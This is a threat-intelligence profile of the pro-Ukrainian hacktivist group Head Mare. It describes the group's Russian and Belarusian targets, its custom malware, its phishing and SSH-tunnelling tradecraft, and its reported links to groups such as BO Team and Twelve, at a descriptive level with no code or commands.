Head Mare

Head Mare is a pro-Ukrainian hacktivist threat group active since at least 2023 that targets Russian and Belarusian organizations. Reported victim sectors include government, logistics, finance, industry, construction, manufacturing, education, science, and other commercial organizations in Russia, as well as Belarusian targets. The group has been linked to phishing-led intrusions and exploitation of newly disclosed vulnerabilities, including the TrueConf Server vulnerability BDU:2025-10114 and NTLM hash-leak vulnerability CVE-2024-43451. Head Mare is known for custom malware including PhantomCore, PhantomDL, PhantomHeart, and PhantomProxyLite. PhantomCore/PhantomDL has been delivered through phishing campaigns using password-protected archives containing disguised .lnk or .url files, with decoy documents and PowerShell loaders. In a February 2026 campaign, a new C++ PhantomCore variant provided remote shell access, used JSON over HTTP POST for C2, and was paired with a Golang utility, TemplateMaintenanceHost.exe, to launch the built-in Windows ssh.exe client and create reverse tunnels that enabled proxying into victim local networks. Observed persistence included PSFactoryBuffer COM hijacking and scheduled tasks. In late 2025 and early 2026, Head Mare introduced PhantomHeart, first as a DLL and later as a PowerShell implementation, reflecting increased Living-off-the-Land tradecraft. PhantomHeart communicates with C2 over HTTP, registers infected hosts with system metadata, and can establish SSH tunnels via OpenSSH remote port forwarding. Head Mare also reimplemented PhantomProxyLite in PowerShell, persisted it via scheduled tasks, and used helper tooling such as adduser.exe to create a local administrator account and disable UAC. Additional tools observed with Head Mare activity include MicroSocks, Mimikatz, Advanced Port Scanner, LockBit samples, and Sliver. The group heavily uses SSH tunneling and native Windows/OpenSSH components for persistence, remote access, and lateral movement. Reported techniques include phishing with malicious archives and shortcut files, PowerShell loaders, COM hijacking, scheduled-task persistence, reverse SSH tunnels, SOCKS proxying, credential theft and post-exploitation using Impacket tooling, and exploitation of NTLM weaknesses for hash leakage and follow-on movement. Reporting also notes operational overlap or collaboration with other pro-Ukrainian groups. Head Mare has likely joined forces with Twelve to target Russian entities. Kaspersky reported coordination with BO Team, including overlapping infrastructure and a possible division of labor in which Head Mare gains initial access through phishing and BO Team conducts follow-on malware deployment. F6 also reported collaboration between Bearlyfy and Head Mare. Separate reporting noted some infrastructure and directory overlaps with Cloud Atlas, including PhantomHeart-related SSH tunneling artifacts, but concluded the TTPs remain distinct. Known aliases directly reflected in the content are Head Mare and head_mare.